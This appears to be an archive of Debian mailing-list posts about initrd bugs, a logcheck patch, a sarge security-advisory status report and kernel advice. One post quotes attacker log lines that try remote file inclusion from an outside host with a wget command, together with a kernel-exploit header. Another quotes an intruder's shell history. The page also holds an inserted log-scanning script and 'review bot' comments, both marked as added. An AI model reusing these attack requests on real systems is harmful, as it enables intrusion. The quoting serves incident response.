Re: [Yaird-devel] Bug#496500: yaird: fails to create initrd when running 2.6.24 etchnhalf kernel

2008-08-26 Thread maximilian attems
On Mon, 25 Aug 2008, Jonas Smedegaard wrote:

> +1021_new-style_firewire.patch

etch+half kernel has old ieee1394, no need for that one.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: [Yaird-devel] Bug#496500: yaird: fails to create initrd when running 2.6.24 etchnhalf kernel

2008-08-25 Thread Maximilian Attems
On Mon, Aug 25, 2008 at 12:26 PM, Jonas Smedegaard <[EMAIL PROTECTED]> wrote:
> On Mon, Aug 25, 2008 at 04:29:39PM +0800, James Andrewartha wrote:
>>Package: yaird
>>Version: 0.0.12-18
>>Severity: important
>>
>>This is bug 431534, exposed again because stable has an old version of
>>yaird but a recent kernel.
>
> Acknowledged.
>
> I see some different approaches to this:
>
>  1. Leave this bug open but do nothing about it.
> * This bug is not a security issue in itself
> * Security-related kernel updates can switch to initramfs-tools

etch+half linux images are an optional upgrade.
never meant to be the default.


>  2. Release 0.0.12-18+etch1 fixing only this specific issue
> * Security-updates must be minimal
>  3. Release backport of newest yaird in unstable
> * Linux changes are large already, so "must be minimal" cannot
>   apply here
> * Most if not all recent yaird changes are to support the major
>   changes to recent Linux kernels
>  4. Drop yaird from etchnhalf
> * Yaird has been dropped from testing (see bug#457177)

that would mean dropping yaird out of etch, seems a bit late for that too.

>
>
> If we do 1) when should probably go through and etch-tag all other bugs
> fixed recently.
>
> If we do 3) then a single change must be made compared to current
> package in Sid: LVM workaround must be enabled by default.
>
>
> Cc'ing release team and security team for input.
>
>
> NB! Even if yaird really is "generally too buggy" as judged in
> bug#457177, the current release in unstable is far better than the
> version currently in Etch, (contains no known regressions, and actually
> works out-of-the-box in many cases with recent Linux kernels whereas
> etch release doesn't).

this diff seems a bit huge for a stable update.
also considering that lenny is about to be released.
as yaird is considered to be working with default etch kernel, that bug
doesn't need any further action.

regards

-- 
maks





Re: Why not have firewall rules by default?

2008-01-23 Thread maximilian attems
On Wed, Jan 23, 2008 at 08:29:25AM -0700, Michael Loftis wrote:
> 
> It's better to leave the service disabled, or even better, completely 
> uninstalled from a security standpoint, and from a DoS standpoint as well. 
> The Linux kernel isn't very efficient at processing firewall rules.  Newer 
> kernels might be though (I honestly haven't looked as deeply into this in 
> late 2.6 as i did/do in 2.4...2.4 processes firewall rules strictly step by 
> step)

baah any 2.4 info is terribly outdated these days
(besides not being supported on any modern distro).
it was already when 2.6.0 got released, but woow
for a better feeling of dev speed, check out git:

~/src/linux-2.6$ git diff --shortstat v2.6.22..v2.6.23
 7203 files changed, 406268 insertions(+), 339071 deletions(-)

2.6.24 is not yet released:
~/src/linux-2.6$ git diff --shortstat v2.6.23..
 10203 files changed, 775468 insertions(+), 482968 deletions(-)

-- 
maks





Re: initrd without root console?

2007-03-11 Thread maximilian attems
hello harald,

On Sun, Mar 11, 2007 at 01:43:21PM +0100, Harald Krammer wrote:
> Hi maximilian,
> thanks, that's it.

top posting is a bad ml reply style
http://www.caliburn.nl/topposting.html
 
> How about to set it as default behavior?

isn't the answer quite obvious!?
anyway this is ot here and belongs to d-kernel.
 
amicalement

--
maks





Re: initrd without root console?

2007-03-11 Thread maximilian attems
hello,

On Sun, Mar 11, 2007 at 10:53:34AM +0100, Harald Krammer wrote:
> Hi!
> I saw new  behavior in Debian / Etch and I am not sure what I should
> think about.
> If the boot-up fails to mount the root-disk then I will get a root
> console without any password authentication. Is it easy possible to
> switch off this feature?


http://www.debian.org/doc/manuals/securing-debian-howto/ch4.en.html#s-kernel-initramfs-prompt
 
sunny greetings

--
maks





Re: ***DEB*: Re: help needed

2006-11-06 Thread maximilian attems
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 499 "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 
> http://213.202.214.106/CMD.gif isn't a gif.
> 
> [snip]
> 
> if ($kernel == "write") {
>     $kernel = "/*\n" .
>       " * hatorihanzo.c\n" .
>       " * Linux kernel do_brk vma overflow exploit.\n" .
>       " *\n" .
>       " * The bug was found by Paul (IhaQueR) Starzetz <[EMAIL PROTECTED]>\n" .
>       " *\n" .
>       " * Further research and exploit development by\n" .
>       " * Wojciech Purczynski <[EMAIL PROTECTED]> and Paul Starzetz.\n" .
>       " *\n" .
>       " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
>       " *\n" .
>       " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
>       " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
> 
> [/snip]
> 
> I think this will give you an idea of what happened.

keep your kernel up to date, easiest if you use the Debian provided
linux images, they have security support.
this hole is closed since long there.

-- 
maks
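
A way to find requests like the two quoted in this message across a whole access log, as an added example that is not part of the original thread: it reports every request in which a query parameter's value is itself a URL, together with the HTTP status, so served requests (2xx) can be separated from refused ones (403 above). The function names, the sample log lines and all addresses in them are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag access-log requests whose query string carries a URL
# as a parameter value (the base_path=http://... pattern quoted above).

# Constructed sample lines in combined log format (documentation addresses).
sample_log() {
cat <<'EOF'
198.51.100.7 - - [03/Nov/2006:17:26:03 +0100] "GET http://192.0.2.10/cms/connectors/Thumbnail.php?base_path=http://203.0.113.9/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "-" "Mozilla/4.0"
198.51.100.7 - - [03/Nov/2006:17:26:04 +0100] "GET /cms/index.php?page=about HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
192.0.2.44 - - [03/Nov/2006:17:30:10 +0100] "GET /gallery.php?inc=ftp%3A%2F%2F203.0.113.9%2Fx.txt HTTP/1.1" 200 88 "-" "curl/7.15"
192.0.2.50 - - [03/Nov/2006:17:31:00 +0100] "GET /redirect?next=/home HTTP/1.1" 302 0 "http://example.org/?u=http://example.org/" "Mozilla/5.0"
EOF
}

# Reads log lines from files given as arguments, or from stdin.
# Prints: client-ip  status  parameter-name  remote-host
find_url_params() {
  awk '
  {
    # Split on double quotes: q[2] is the request line, q[3] holds status/bytes.
    # The Referer (q[4]) is deliberately not inspected.
    n = split($0, q, "\"")
    if (n < 3) next
    split(q[1], pre, " ");  ip = pre[1]
    split(q[2], req, " ");  target = req[2]
    split(q[3], post, " "); status = post[1]

    i = index(target, "?")
    if (i == 0) next
    query = substr(target, i + 1)

    # Minimal decoding: only the encoded ":" and "/" needed to spot a scheme.
    # Double-encoded values are not handled here.
    gsub("%3[aA]", ":", query)
    gsub("%2[fF]", "/", query)

    m = split(query, params, "&")
    for (k = 1; k <= m; k++) {
      e = index(params[k], "=")
      if (e == 0) continue
      name = substr(params[k], 1, e - 1)
      val  = tolower(substr(params[k], e + 1))
      if (val ~ "^(https?|ftp)://") {
        host = val
        sub("^[a-z]+://", "", host)   # drop the scheme
        sub("[/?#:].*$", "", host)    # keep only the host part
        print ip, status, name, host
      }
    }
  }' "$@"
}

# Keep only hits the server answered with a 2xx status: these need follow-up.
served_only() {
  awk '$2 ~ "^2"'
}

echo "all hits:"
sample_log | find_url_params
echo "served (2xx):"
sample_log | find_url_params | served_only
```

A 403 hit shows the request was refused; a 2xx hit on an include-style parameter is the case to investigate on the host.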





Re: Target filesystem

2006-06-09 Thread maximilian attems
On Fri, Jun 09, 2006 at 07:47:45AM -0400, Brent Clark wrote:
> Hey all
> 
> I seem to be experiencing problems booting up (Thank goodness for Knoppix)
> 
> There are a host of errors, but the end message is:
> 
> Target filesystem doesn't have /sbin/init
> /bin/sh: can't access tty; job control turned off and then I get busybox
> 
> From googling this seems a common problem.
> 
> Would anyone know how to force this to work?

you are posting to the wrong ml,
debian-security has _nothing_ to do with early boot!
and the actual error message is just above from what you pasted.
 
> From what I gather it cant detect the filesystem (think its a modprobe 
> problem)

do you run latest udev 0.093-1 version? (if not upgrade)

do you pass the correct boot param in grub root=/dev/sdaX or /dev/hdaX
presumably.

is your root device created?
check ls $ROOT in rescue console.
if not and with wrong udev and old 2.6.15 use 
modprobe ide-disk
 
> If anyone can assist, it would be most appreciated.
> 
> Kind Regards
> Brent Clark

please take the effort to research correct ml debian-user-$lang
or file a bug against initramfs-tools if the problem persists.

regards

-- 
maks





Re: [sec] Re: failed root login attempts

2004-09-20 Thread maximilian attems
On Sun, 19 Sep 2004, martin f krafft wrote:

> also sprach Noah Meyerhans <[EMAIL PROTECTED]> [2004.09.19.2219 +0200]:
> > As an additional point against these scripts, they are host based.
> > If I'm going to bother blackholing the source of these login
> > attempts, I'm going to do it at the border.  Yes, I can write
> > scripts to react to this kind of scanning and have it
> > automatically manipulate access lists on the routers, I'm not sure
> > I really like the idea.  I'm sort of leaning in that direction, at
> > this point, though, just to shut up logcheck without telling it to
> > ignore all failed root login attempts.
> 
> If you ask me, logcheck should learn how to evaluate log messages in
> their context...

hmm there are ideas for logcheck after sarge+1, please elaborate.
ATM logcheck is a pretty dumb `egrep -v' wrapper of your logs.

that simplicity of design has its strength,
but there are for example demands for trigger values.


--
maks
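
The two ideas in this message side by side, as an added example that is not logcheck's code: an `egrep -v` style filter driven by a pattern file, followed by a trigger value that reports failed root logins only for sources at or above a threshold. The function names, the ignore patterns and the sample log lines are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: "egrep -v wrapper" filtering plus a trigger value.

# Constructed syslog lines (documentation addresses).
sample_auth_log() {
cat <<'EOF'
Sep 19 22:01:01 gw CRON[811]: (root) CMD (run-parts /etc/cron.hourly)
Sep 19 22:03:10 gw sshd[901]: Failed password for root from 203.0.113.5 port 40112 ssh2
Sep 19 22:03:12 gw sshd[903]: Failed password for root from 203.0.113.5 port 40115 ssh2
Sep 19 22:03:15 gw sshd[905]: Failed password for root from 203.0.113.5 port 40119 ssh2
Sep 19 22:03:19 gw sshd[907]: Failed password for root from 203.0.113.5 port 40121 ssh2
Sep 19 22:10:44 gw sshd[950]: Accepted publickey for admin from 192.0.2.8 port 51000 ssh2
Sep 19 23:40:02 gw sshd[990]: Failed password for root from 198.51.100.20 port 33001 ssh2
EOF
}

# Constructed ignore rules, one extended regex per line, as a pattern file
# for grep -E -v -f.
ignore_rules() {
cat <<'EOF'
CRON\[[0-9]+\]: \(root\) CMD \(
sshd\[[0-9]+\]: Accepted publickey for [^ ]+ from
EOF
}

# Step 1: the context-free filter. Every line matching any rule is dropped,
# every other line is reported, however often it repeats.
filtered_log() {
  rules=$(mktemp) || return 1
  ignore_rules > "$rules"
  sample_auth_log | grep -E -v -f "$rules"
  rm -f "$rules"
}

# Step 2: the trigger value. Count failed root logins per source address and
# print "count address" only for sources with at least $1 failures.
root_failures_over() {
  awk -v min="$1" '
    / Failed password for root from / {
      for (i = 1; i < NF; i++)
        if ($i == "from") { n[$(i + 1)]++; break }
    }
    END { for (ip in n) if (n[ip] >= min) print n[ip], ip }
  ' | sort -rn
}

# Filter first, then apply the threshold to what is left.
run_report() {
  filtered_log | root_failures_over "$1"
}

echo "lines left after the ignore rules: $(filtered_log | wc -l | tr -d ' ')"
echo "sources with 3 or more failed root logins:"
run_report 3
```

With the threshold at 3 the single stray failure no longer produces a report line, while the repeated source still does.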





Re: [sec] debian patched linux kernels

2004-08-16 Thread maximilian attems
On Mon, 16 Aug 2004, LeVA wrote:

> Hi!
> 
> Are the debian patched kernels preferred for server/desktop use, or 
> are they just minor cosmetic patches? what is the difference between 
> the kernel.org's kernel source and the debian patched kernel sources?

long version read debian/changelog of kernel-source-2.x.x

short try:
removed drivers with inappropriate licences.
upstream fixes that didn't make it for latest release,
but are scheduled for next release or not yet included bugfixes
(this includes from time to time security fixes)

so if you don't read lkml you are better off with the kernel-source
provided by debian. the debian kernel team is maintained by upstream
maintainers, which know their job. 
on the nice side the debian kernel are very close to those of kernel.org.

a++ maks


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#241236: [patch] ignore files in ignore.d.violations without prefix

2004-03-31 Thread maximilian attems
Package: logcheck
Version: 1.2.16
Severity: wishlist
Tags: patch


hello steve kemp,

this patch allows the user to _really_ write his own
files in ignore.d.violations
previously they had to have the prefix logcheck-,
which isn't handy, not documented and therefore seems to be a bug .. 
took some time to figure out. ;)

as a side note logcheck installs rules in this dir without logcheck-
prefix like su.

as a bonus attached patch catches also a typing fix.
regards maks


ps tested on my machine, works like charm.

--- logcheck-1.2.16/src/logcheck2004-03-03 20:39:53.0 +0100
+++ logcheck-1.2.16-maks/src/logcheck   2004-03-31 15:29:48.0 +0200
@@ -233,7 +233,7 @@
 
 RETURN=1
 
-for grepfile in $(ls -1 $raise | grep -v "logcheck-.*"); do
+for grepfile in $(ls -1 $raise); do
debug "greplogoutput: $grepfile"
 
egrep --text -f $raise/$grepfile $TMPDIR/logoutput-sorted \
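
Review bot: in `for grepfile in $(ls -1 $raise)`, dropping the `grep -v "logcheck-.*"` filter means every name in $raise is now passed to `egrep --text -f`, including any logcheck- prefixed file that this loop used to skip, as well as editor backups or packaging leftovers that happen to sit in the directory. If the prefix exclusion is intentionally gone, say so in the changelog and consider skipping names that are not rule files; `$raise` is also unquoted, so a path containing whitespace would be split by the `$(ls -1 ...)` expansion.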
@@ -252,8 +252,8 @@
if [ "$(basename $grepfile)" = "logcheck" ]; then 
 
debug "Applying Logcheck override files"
-   # Now ignore all entries from the locgheck- files
-   for file in $(ls -1 $ignore/ | grep "logcheck-.*") ; do
+   # Now ignore all entries from the logcheck- files
+   for file in $(ls -1 $ignore/) ; do
debug "clean logcheck-: $file"
egrep --text -v -f $ignore/$file $TMPDIR/checked \
>> $TMPDIR/checked.1
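
Review bot: the loop `for file in $(ls -1 $ignore/)` now applies every file in $ignore as an `egrep --text -v -f` filter, so any stray file in that directory silently suppresses matching lines from $TMPDIR/checked, and a file containing an empty line matches everything and would drop the whole report. Since this is the path that decides which violations are hidden, restrict the loop to the expected rule files (for example skip backup names). The comment "Now ignore all entries from the logcheck- files" and `debug "clean logcheck-: $file"` still describe the old prefix-only behaviour and should be reworded.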





Re: [sec] Time for apt-secure?

2003-11-27 Thread maximilian attems
On Thu, 27 Nov 2003, Camillo Särs wrote:

> I am using apt-secure, but it's not part of stable.  What's the real
> plan 
> for apt-secure, will it be standard in the next major release?  AFAIK, 
> there are many wrinkles to be ironed out...
 
 i agree that it would be nice to have the choice of an apt-sec
 package basically latest apt just with the relevant patch
 from http://monk.debian.net/apt-secure/
 maybe someone could build such a packet?


 a++ maks




[check] DSA vulnerabilities sarge

2003-10-14 Thread maximilian attems
hi,

i checked almost all DSA since woody release (DSA > 133)
the resume is: on a clean exposed sarge install the vast 
majority of DSA is resolved, but you better not run 
kde, sendmail, mysql, perl (cgi), php, tomcat or imagemagick.

you'll find below the report listing security alerts affecting
sarge, and the resolved ones (by new upstream release and|or 
new package, which went into sarge until now).
the report lacks at the time about 50 DSA, where 
the reference to sid is "this problem will be fixed soon".
in the next week i'll look deeper in their cases,
for the moment i only parsed the DSA themselves.

as a side note this work would be easier if the DSA
would generally list "fixed by upstream version 2.2.22"
this information rarely shows up on a DSA,
i tend to think that such notice would improve their 
outstanding quality!

i hope this helps for further and broader testing of sarge,
i know the debian security faq concerning testing,
but perhaps someone out there wants to provide an 
unofficial security mirror especially after kde goes in?
perhaps in a month or so unresolved issues should get 
their bug report, what do you think?

i will try to keep you informed weekly on progress,
suggestions or corrections are welcome!!!

a++
ma(ks|x(imilian)?)


 DSA affecting Sarge/Testing:
[19 Sep 2003] DSA-388_kdebase - several vulnerabilities
sarge 4:2.2.2-14
[17 Sep 2003] DSA-384_sendmail - buffer overflows
sarge 8.12.9-5
sid fixed in version 8.12.10-1
[13 Sep 2003] DSA-381_mysql - buffer overflow
sarge 4.0.13-3
upstream version until 4.0.14 vulnerable
[11 Aug 2003] DSA-371_perl - cross-site scripting
sarge 5.8.0-18
sid fixed in version 5.8.0-19
[08 Aug 2003] DSA-369_zblast - buffer overflow
sarge 1.2pre-5 
sid fixed in version 1.2.1-7
[05 Aug 2003] DSA-365_phpgroupware - several vulnerabilities
bug #201980
upstream release fixes reported bugs 0.9.14.006
[01 Aug 2003] DSA-361_kdelibs,_kdelibs-crypto - several vulnerabilities
sarge 4:2.2.2-13
no separate kdelibs-crypto
sid fixed in version 4:3.1.3-1
[31 Jul 2003] DSA-359_atari800 - buffer overflows
sarge 1.2.2-1
bug #203707
upstream version 1.3.1-2 fixes reported bug
[29 Jul 2003] DSA-354_xconq - buffer overflows
sarge 7.4.1-2.1
bug #202963 still open
[22 Jul 2003] DSA-352_fdclone - insecure temporary directory
sarge 2.04a-1
sid fixed in version 2.04-1
[16 Jul 2003] DSA-351_php4 - cross-site scripting
sarge 4:4.1.2-6
bug #200736
upstream version php4_4.3.2+rc3 fixed XSS vulnerabilities
[08 Jul 2003] DSA-343_skk,_ddskk - insecure temporary file
sarge skk 10.62a-6 ddskk 12.2.rel.0-2
upstream fixed in 12.1.cvs.20030622-1
[07 Jul 2003] DSA-342_mozart - unsafe mailcap configuration
sarge 1.2.3.20011204-3
sid fixed in version 1.2.5.20030212-2
[08 Jul 2003] DSA-346_phpsysinfo - directory traversal
sarge 2.0-3
bug #200543 still open
[27 Jun 2003] DSA-331_imagemagick - insecure temporary file
sarge 4:5.4.4.5-1
sid fixed in version 4:5.5.7-1
[19 May 2003] DSA-306_ircii-pana - buffer overflows, integer overflow
sarge 1:1.0-0c19.20030512-1
sid fixed in version 1.0-0c19-8
[30 Apr 2003] DSA-296_kdebase - insecure execution
sarge 4:2.2.2-14
[23 Apr 2003] DSA-293_kdelibs - insecure execution
sarge 4:2.2.2-13
[17 Apr 2003] DSA-289_rinetd - incorrect memory resizing
sarge 0.62-1
sid fixed in version 0.62-2
[12 Apr 2003] DSA-284_kdegraphics - insecure execution
sarge 4:2.2.25
[28 Feb 2003] DSA-256_mhc - insecure temporary file
sarge 0.25+20010625-7
sid fixed in version 0.25+20030224-1
[12 Feb 2003] DSA-250_w3mmee-ssl - missing HTML quoting
sarge 0.3.p23.3-1.5
sid fixed in version 0.3.p24.17-3
[24 Jan 2003] DSA-243_kdemultimedia - several vulnerabilities
sarge 4:2.2.25
[24 Jan 2003] DSA-242_kdebase - several vulnerabilities
sarge 4:2.2.2-14
[24 Jan 2003] DSA-241_kdeutils - several vulnerabilities
sarge 4:2.2.25
[23 Jan 2003] DSA-240_kdegames - several vulnerabilities
sarge 4:2.2.2-2
[23 Jan 2003] DSA-239_kdesdk - several vulnerabilities
sarge 4:2.2.25
[23 Jan 2003] DSA-238_kdepim - several vulnerabilities
sarge 4:2.2.2-5
[22 Jan 2003] DSA-237_kdenetwork - several vulnerabilities
sarge 4:2.2.2-14.1
[22 Jan 2003] DSA-236_kdelibs - several vulnerabilities
sarge 4:2.2.2-13
[22 Jan 2003] DSA-235_kdegraphics - several vulnerabilities
sarge 4:2.2.25
[22 Jan 2003] DSA-234_kdeadmin - several vulnerabilities
sarge 4:2.2.25
[09 Jan 2003] DSA-225_tomcat4 - source disclosure
sarge 4.0.4-4
sid fixed in version 4.1.16-1
[20 Dec 2002] DSA-214_kdenetwork - buffer overflows
sarge 4:2.2.2-14.1
sid fixed 2.2.2-14.20
[11 Nov 2002] DSA-193_kdenetwork - buffer overflow
sarge 4:2.2.2-14.1
sid fixed in version 2.2.2-14.3
[04 Oct 2002] DSA-170_tomcat4 - source code disclosure
sarge 4.0.4-4
sid fixed in version 4.1.12-1
[18 Sep 2002] DSA-168_php - bypassing safe_mode, CRLF injection
sarge 4.1.2-6
sid fixed in version  4.2.3-3



TODO: deeper look in the following security alerts
mostly "this problem will be fixed soon" +..
[28 Sep 2003] DSA-391_freesweep - buffer overflow
[26 Sep 2003] DSA-390_marbles - bu

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread maximilian attems
On Thu, 18 Sep 2003, Christian Storch wrote:

> Don't forget to try to find the potential hole first!
> Otherwise you could have a fast recurrence.
> [..]
> > > in /etc/.rpn theres a .bash_history with the following content:
> > > >id
> > > >mkdir /etc/.rpn
> > > >ps -aux
> > > >ps -aux | grep tbk
> > > >kill -15292 pid
> > > >kill 15292
> > > >netconf
> > > >locate httpd.conf
> > > >cd /etc/.rpn
> > > >ls -al
> > > >wget
> > > >cd /var/www/cncmap/www/upload/renegade
> > > >ls -al
> > > >rm -rf phpshell.php
  ^__^
was this the exploited hole ?

thx for info
a++ maks
 


--  
 free software is not free at all, and "actually a different form of monopoly"
 ARLENE MCCARTHY member of the european parliament (labour party)
 -> http://swpat.ffii.org/#guardian-nhill030619
 please pay attention avoiding software patents:
 -> http://swpat.ffii.org/index.en.html



